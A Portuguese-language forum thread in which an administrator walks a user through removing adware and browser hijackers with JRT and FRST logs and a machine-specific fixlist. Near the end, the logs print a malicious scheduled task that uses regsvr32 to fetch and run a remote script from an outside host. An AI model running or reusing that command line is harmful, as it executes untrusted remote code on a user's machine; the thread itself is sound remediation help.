Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeService (Registry Key)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} (Registry Key)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} (Registry Key)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 05/05/2017 at 18:51:15,20
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Segui aquelas primeiras orientações, só alterando a sequência de acordo com as últimas postagens. Não cliquei em "Digitalizar" e sim em "Limpar". E tb marquei os espaços em Opções segundo vc orientou da 1ª vez.
Abç
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
RELATÓRIO DO JRT:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 10 Home Single Language x64
Ran by ADEMIR MONTEIRO (Administrator) on 05/05/2017 at 18:47:43,62
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 4
Failed to delete: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\elex-tech (Folder)
Failed to delete: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js (File)
Failed to delete: C:\Program Files (x86)\elex-tech (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDEventLauncherTask (Task)
Deleted the following from C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\prefs.js
user_pref(browser.search.searchengine.desc, this is my first firefox searchEngine);
user_pref(browser.search.searchengine.ptid, cor);
user_pref(browser.search.searchengine.uid, ST750LM022XHN-M750MBB_S317J90D848001848001);
Registry: 8
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlBoot (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlKit (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlR3 (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeNetFilter (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeService (Registry Key)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} (Registry Key)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} (Registry Key)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 05/05/2017 at 18:51:15,20
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Sáb 06 maio 2017, 15:36
Joram, onde encontro o link para o Zoek?
Relatório FRST.txt
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Relatório Addition.txt
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Joram, depois de resolvermos estas pendengas, gastaria que vc visse esta praga HAO 123-Brasil. Ela está comigo há uns dois os três anos!! Já tentei desinstalar de várias formas, mas sou encaminhado sempre para a sua página na web.
Ele abria na página inicial do Firefox, mas removi-o de lá sem problemas. Aparentemente, parece não ocasionar nenhum problema. Aparentemente. Mas, vai que...
Abç
PS.: No aguardo de suas respostas
Relatório FRST.txt
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Relatório Addition.txt
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Joram, depois de resolvermos estas pendengas, gastaria que vc visse esta praga HAO 123-Brasil. Ela está comigo há uns dois os três anos!! Já tentei desinstalar de várias formas, mas sou encaminhado sempre para a sua página na web.
Ele abria na página inicial do Firefox, mas removi-o de lá sem problemas. Aparentemente, parece não ocasionar nenhum problema. Aparentemente. Mas, vai que...
Abç
PS.: No aguardo de suas respostas
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Sáb 06 maio 2017, 20:06
/_ Boa Noite! Ademir _\
> A Zoek e hao123 ficará para depois do script fixlist.
> Copie estas informações que estão no sploiler,para o Bloco de Notas.
> Salve-as com o nome fixlist. << Texto!
> Salve-as no desktop! ( Área de trabalho ... )
> Execute FRST/FRST64 >> Clique "Corrigir" << Aguarde!
> Na mensagem,clique Executar.
> Poste o relatório! (Fixlog.txt)
> Este e outros relatórios,podem ser encontrados na pasta: Disco Local (C) > FRST > Logs
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
< Peço aos visitantes que não utilizem este script em outros computadores,sob risco de danos aos mesmos! >
A+
> A Zoek e hao123 ficará para depois do script fixlist.
> Copie estas informações que estão no sploiler,para o Bloco de Notas.
> Salve-as com o nome fixlist. << Texto!
> Salve-as no desktop! ( Área de trabalho ... )
- Spoiler:
- start
CloseProcesses:
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6F2E5825-C576-4536-A9BE-FF7181495112} URL =
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {BD62CFA9-F375-461C-A90E-AB90B578F202} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
FF user.js: detected! => C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js [2017-05-05]
FF NewTab: Mozilla\Firefox\Profiles\w6trckk7.default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
FF Homepage: Mozilla\Firefox\Profiles\w6trckk7.default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [41080 2015-09-30] ()
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== ATENÇÃO
S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] <==== ATENÇÃO
2017-04-29 22:52 - 2017-04-29 22:52 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech
2017-04-25 22:01 - 2017-05-05 22:01 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-25 09:27 - 2017-04-25 09:27 - 00000000 _____ C:\WINDOWS\SysWOW64\22
2017-04-25 09:27 - 2017-04-25 09:27 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-19 08:08 - 2017-04-19 08:08 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\3DM
2017-04-18 12:46 - 2017-04-18 12:46 - 00000000 ____D C:\Program Files (x86)\temp
2017-04-18 11:43 - 2017-04-18 11:44 - 01871912 _____ (LogMeIn, Inc.) C:\Users\ADEMIR MONTEIRO\Downloads\Support-LogMeInRescue.exe
2017-04-17 19:05 - 2017-04-25 09:27 - 00034328 _____ (Sysinternals - [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-17 19:05 - 2017-04-17 19:05 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 19:00 - 2017-04-27 10:04 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-02-19 11:21 - 2017-02-19 11:21 - 00002390 _____ C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium.lnk
2017-02-19 11:21 - 2017-02-19 11:21 - 00002382 _____ C:\Users\ADEMIR MONTEIRO\Desktop\Chromium.lnk
2017-02-19 11:20 - 2017-02-19 11:21 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\chromium
2017-02-09 20:48 - 2017-05-05 19:02 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\LocalLow\Mozilla
2017-04-28 14:15 - 2016-10-22 13:20 - 00000000 ____D C:\WINDOWS\System32\Tasks\R@1n-KMS
Task: {6003891B-4C6E-4CE1-A27D-41743253E457} - System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
C:\Program Files (x86)\Elex-tech\YAC
C:\Program Files (x86)\Elex-tech
SubSystems: [Windows] ==> YAC
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Reboot:
Hosts:
end
> Execute FRST/FRST64 >> Clique "Corrigir" << Aguarde!
> Na mensagem,clique Executar.
> Poste o relatório! (Fixlog.txt)
> Este e outros relatórios,podem ser encontrados na pasta: Disco Local (C) > FRST > Logs
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
< Peço aos visitantes que não utilizem este script em outros computadores,sob risco de danos aos mesmos! >
A+
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Dom 07 maio 2017, 11:25
Bom dia, joram!
Parece que aqui temos o mesmo prob da última vez que tratamos do assunto. Minha ignorância técnica faz as coisas meio complicadas. Os links dos relatórios FRST.txt e Addition.txt postados aí em cima (na última postagem) foi seguindo este caminho: "Examinar" > "Corrigir" > "Executar".
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Eu realmente não estou conseguindo sair deste impasse. Aconteceu da primeira vez, vc orientou, mas não me recordo como conseguir resolver. Se vc puder ser mais didático, tipo para uma criança (rsrs é o jeito!), posso conseguir sair desta.
Abraço
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Parece que aqui temos o mesmo prob da última vez que tratamos do assunto. Minha ignorância técnica faz as coisas meio complicadas. Os links dos relatórios FRST.txt e Addition.txt postados aí em cima (na última postagem) foi seguindo este caminho: "Examinar" > "Corrigir" > "Executar".
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Eu realmente não estou conseguindo sair deste impasse. Aconteceu da primeira vez, vc orientou, mas não me recordo como conseguir resolver. Se vc puder ser mais didático, tipo para uma criança (rsrs é o jeito!), posso conseguir sair desta.
Abraço
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Dom 07 maio 2017, 12:59
/_ Boa Tarde! Ademir _\
Tentarei ser mais específico,onde interpretações de texto,costumam variar de pessoa à pessoa.
Execute novamente a FRST.exe,com a fixlist ao desktop,mas... faça antes correções ao disco,por intermédio do comando CHKDSK /f /r
Caso queira,vc pode verificar esta necessidade ,ao constatar se existem problemas no disco.
> Acesse o Prompt de comando,com privilégios de administrador!
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
> Clique direito em cmd.exe e escolha executar como administrador.
> Digite: CD\ ou CD \ >> Aperte Enter!
> À seguir,digite ou cole ao prompt,este comando: cmd /k fsutil dirty query c:
> Aperte Enter!
> Se a resposta ao comando,for: Volume C: está sujo. ( is dirty )
> Então haverá necessidade de reparo ao disco.
[]s
Tentarei ser mais específico,onde interpretações de texto,costumam variar de pessoa à pessoa.
Execute novamente a FRST.exe,com a fixlist ao desktop,mas... faça antes correções ao disco,por intermédio do comando CHKDSK /f /r
Caso queira,vc pode verificar esta necessidade ,ao constatar se existem problemas no disco.
> Acesse o Prompt de comando,com privilégios de administrador!
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
> Clique direito em cmd.exe e escolha executar como administrador.
> Digite: CD\ ou CD \ >> Aperte Enter!
> À seguir,digite ou cole ao prompt,este comando: cmd /k fsutil dirty query c:
> Aperte Enter!
> Se a resposta ao comando,for: Volume C: está sujo. ( is dirty )
> Então haverá necessidade de reparo ao disco.
[]s
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Dom 07 maio 2017, 18:24
Boa noite, caro joram:
O Prompt de comando diz que o disco esta limpo.
Mas, vamos lá, só um pouco mais de paciência, na interpretação do que vc postou: executar o FRST.exe, ok.
O que ainda não entendi é se "Fixlist" é um 3º relatório além do FRST.txt e do Addition.txt. Porque são os únicos gerados depois de Executar e Corrigir, já postados segundo a sequência determinada. Os dois estão salvos no desktop.
Vc fala em executar de novo o FRST "com a fixlist ao desktop". Eu entendi é que o fixlist já deveria estar no desktop. Se for isso, sinceramente ainda não entendi como gerar e/ou localizá-lo.
Veja, todas os aplicativos baixados e seus respectivos relatórios estão organizados na minha Área de Trabalho:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
O Prompt de comando diz que o disco esta limpo.
Mas, vamos lá, só um pouco mais de paciência, na interpretação do que vc postou: executar o FRST.exe, ok.
O que ainda não entendi é se "Fixlist" é um 3º relatório além do FRST.txt e do Addition.txt. Porque são os únicos gerados depois de Executar e Corrigir, já postados segundo a sequência determinada. Os dois estão salvos no desktop.
Vc fala em executar de novo o FRST "com a fixlist ao desktop". Eu entendi é que o fixlist já deveria estar no desktop. Se for isso, sinceramente ainda não entendi como gerar e/ou localizá-lo.
Veja, todas os aplicativos baixados e seus respectivos relatórios estão organizados na minha Área de Trabalho:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Dom 07 maio 2017, 18:56
/_ Ademir _\
> Esta sequência irá gerar o relatório Fixlog.txt,que me interessa. Os relatórios FRST.txt e Addition.txt,que no momento não são de meu interesse,são gerados com os procedimentos logo abaixo.
> A ferramenta FRST lê o script e gera o Fixlog.txt,que é o relatório que vc deve postar.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Estes rastreadores são o que tornam seus acessos lentos aqui no Fórum,onde na página em que encontra-se seu Tópico,existem 10 Rastreadores que o Ghostery aponta e nos dá a opção de os bloquear.
Neste caso,estou navegando com o Opera e com a extensão Ghostery instalada. Bastando,à meu ver,bloquear somente as 5 Publicidades em vez de tudo,para um bom resultado.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Edit: Hoje dia 8 de Maio,visitando esta página,bloquiei nova propaganda. (Taboola)
Ps: Não vou incluir a que o navegador Opera impediu,em sua configuração que não vem por default. Já o rastreador,em Propagandas,AddThis ficou na memória do Ghostery.
Recomendo clicar na mensagem que vem àcima,para recarregar o navegador e ver os resultados destas alterações.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Somente para constar,eis aqui o nível de bloqueio do navegador Opera,quando acessei um video no YouTube. Foram 99 bloqueios,cabendo ao Ghostery a indicação ao [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] que bloquiei manualmente. Ou seja,ele foi ignorado pelo navegador,mas não por mim,já que otimizam propagandas.
[Abs]
> Esta execução somente teria valor com a fixlist ao desktop. Clicando,à seguir,em "Corrigir".<Ademir> Mas, vamos lá, só um pouco mais de paciência, na interpretação do que vc postou: executar o FRST.exe, ok.
> Esta sequência irá gerar o relatório Fixlog.txt,que me interessa. Os relatórios FRST.txt e Addition.txt,que no momento não são de meu interesse,são gerados com os procedimentos logo abaixo.
> Entendeu agora?> Execute a ferramenta! Clique "Sim" >> "Examinar".
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
> Antes de clicar "Examinar",verifique se as caixinhas em "Whitelist" estão assinaladas.
> Em "Exame Opcional",deixe marcada as checkbox "Addition.txt" e "Arquivos 90 Dias".
> Ps: Será gerado,também,o relatório "Addition.txt".
> A ferramenta FRST lê o script e gera o Fixlog.txt,que é o relatório que vc deve postar.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Estes rastreadores são o que tornam seus acessos lentos aqui no Fórum,onde na página em que encontra-se seu Tópico,existem 10 Rastreadores que o Ghostery aponta e nos dá a opção de os bloquear.
Neste caso,estou navegando com o Opera e com a extensão Ghostery instalada. Bastando,à meu ver,bloquear somente as 5 Publicidades em vez de tudo,para um bom resultado.
O link àcima é para ser aplicado ao Firefox.[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Edit: Hoje dia 8 de Maio,visitando esta página,bloquiei nova propaganda. (Taboola)
Ps: Não vou incluir a que o navegador Opera impediu,em sua configuração que não vem por default. Já o rastreador,em Propagandas,AddThis ficou na memória do Ghostery.
Recomendo clicar na mensagem que vem àcima,para recarregar o navegador e ver os resultados destas alterações.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Somente para constar,eis aqui o nível de bloqueio do navegador Opera,quando acessei um video no YouTube. Foram 99 bloqueios,cabendo ao Ghostery a indicação ao [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] que bloquiei manualmente. Ou seja,ele foi ignorado pelo navegador,mas não por mim,já que otimizam propagandas.
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Seg 08 maio 2017, 18:51
Joram, boa noite
Uma estação deu colapso aqui perto e faltou energia quase o dia inteiro ontem, por isso só agora tive folga para acessar a internet. O Firefox tb tem extensões do tipo, mas parece não com a mesma eficiência. O acesso aqui, mesmo pelo Edge, melhorou - um pouco, mas melhorou. Vou aplicar o Ghostery ao Fire. Mas antes, vamos meter bronca no problema (pra mim) do Fixlog.
Desculpa, mas continuo na ignorância, pq os procedimentos definidos por vc já os realizei várias vezes. Com as caixas devidamente marcadas, inclusive "Arquivos 90 dias". Ao executar o FRST64 , não aparece “Sim” mas já aquela caixa com a opção “Executar”. O problema é descobrir o Fixlist, que gera o Fixlog, não é isso? Então, onde encontra-lo. Vc não explicou ainda, apenas reafirmou que o que interessa é o Fixlog!
Para sair deste imbróglio, fui pesquisar nas suas primeiras postagens para encontrar alguma luz, e lá vc diz para eu copiar as informações que estão num link chamado “spoiler”, colá-las no Bloco de Notas e salvá-las no desktop como Fixlist. Feito isto, eu executaria FRST64.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
É esse o caminho? Na esperança que seja,
Abço
Uma estação deu colapso aqui perto e faltou energia quase o dia inteiro ontem, por isso só agora tive folga para acessar a internet. O Firefox tb tem extensões do tipo, mas parece não com a mesma eficiência. O acesso aqui, mesmo pelo Edge, melhorou - um pouco, mas melhorou. Vou aplicar o Ghostery ao Fire. Mas antes, vamos meter bronca no problema (pra mim) do Fixlog.
Desculpa, mas continuo na ignorância, pq os procedimentos definidos por vc já os realizei várias vezes. Com as caixas devidamente marcadas, inclusive "Arquivos 90 dias". Ao executar o FRST64 , não aparece “Sim” mas já aquela caixa com a opção “Executar”. O problema é descobrir o Fixlist, que gera o Fixlog, não é isso? Então, onde encontra-lo. Vc não explicou ainda, apenas reafirmou que o que interessa é o Fixlog!
Para sair deste imbróglio, fui pesquisar nas suas primeiras postagens para encontrar alguma luz, e lá vc diz para eu copiar as informações que estão num link chamado “spoiler”, colá-las no Bloco de Notas e salvá-las no desktop como Fixlist. Feito isto, eu executaria FRST64.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
É esse o caminho? Na esperança que seja,
Abço
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Seg 08 maio 2017, 19:07
/_ Boa Noite! Ademir _\
Sim! É este o caminho,bastando clicar em spoiler,para que ele abra e exponha o script. Ele será copiado a um Bloco de Notas e salvo ao desktop com o nome fixlist.
Agora,para gerar o relatório Fixlog,basta abrir a FRST e clicar "Corrigir".
Entendeu?
[Abs]
Sim! É este o caminho,bastando clicar em spoiler,para que ele abra e exponha o script. Ele será copiado a um Bloco de Notas e salvo ao desktop com o nome fixlist.
Agora,para gerar o relatório Fixlog,basta abrir a FRST e clicar "Corrigir".
Entendeu?
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Seg 08 maio 2017, 19:21
Ufa!! Beleza!! Já instalei o Ghostery no Fire. Vou ter que sair, e qnd voltar (ou amanhã) parto para o Fixlog.Valeu, joram
Abraço
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Seg 08 maio 2017, 19:29
/_ Ademir _\Ademir escreveu:
Valeu, joram
Abraço
Ok! Não basta apenas instalar o Ghostery,vc tem que aprender como bloquear as Publicidades ou propagandas. Mas isto é muito simples e intuitivo.
Não se preocupe!
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Edit: Para maiores informações,dispus este banner que pode lhe ajudar nesta empreitada.
Ps: Ao escolher,das 3 opções ao bloqueio,o ícone do cadeado foca o tracker apenas para este site.
[Abs]
Última edição por joram em Ter 09 maio 2017, 11:58, editado 1 vez(es)
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Ter 09 maio 2017, 11:03
Bom dia joram:
Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 08-05-2017
Executado por ADEMIR MONTEIRO (09-05-2017 10:25:49) Run:1
Executando a partir de C:\Users\ADEMIR MONTEIRO\Desktop
Perfis Carregados: ADEMIR MONTEIRO (Perfis Disponíveis: ADEMIR MONTEIRO)
Modo da Inicialização: Normal
==============================================
Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 08-05-2017
Executado por ADEMIR MONTEIRO (09-05-2017 10:25:49) Run:1
Executando a partir de C:\Users\ADEMIR MONTEIRO\Desktop
Perfis Carregados: ADEMIR MONTEIRO (Perfis Disponíveis: ADEMIR MONTEIRO)
Modo da Inicialização: Normal
==============================================
- Spoiler:
- fixlist Conteúdo:
*****************
start
CloseProcesses:
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001"�
CHR DefaultSearchURL: Default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
CHR DefaultSearchKeyword: Default -> ourluckysites�
Edge HomeButtonPage: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Nenhum Arquivo�
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restri��o <======= ATEN��O�
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main,Start Page = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATEN��O�
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =�
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6F2E5825-C576-4536-A9BE-FF7181495112} URL =�
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {BD62CFA9-F375-461C-A90E-AB90B578F202} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Task: {0F373340-7552-468F-805A-12372F3EBBA3} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATEN��O�
Task: {1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} - System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => launchwinapp.exe [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Task: {1C13CF54-132B-47A3-A9C3-46781DDE17AA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATEN��O�
Task: {1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} - \Microsoft\Windows\Setup\gwx\rundetector -> Nenhum Arquivo <==== ATEN��O�
Task: {2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATEN��O�
Task: {25AF1857-93F1-41E3-95BA-7EE079948513} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll�
Task: {3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATEN��O�
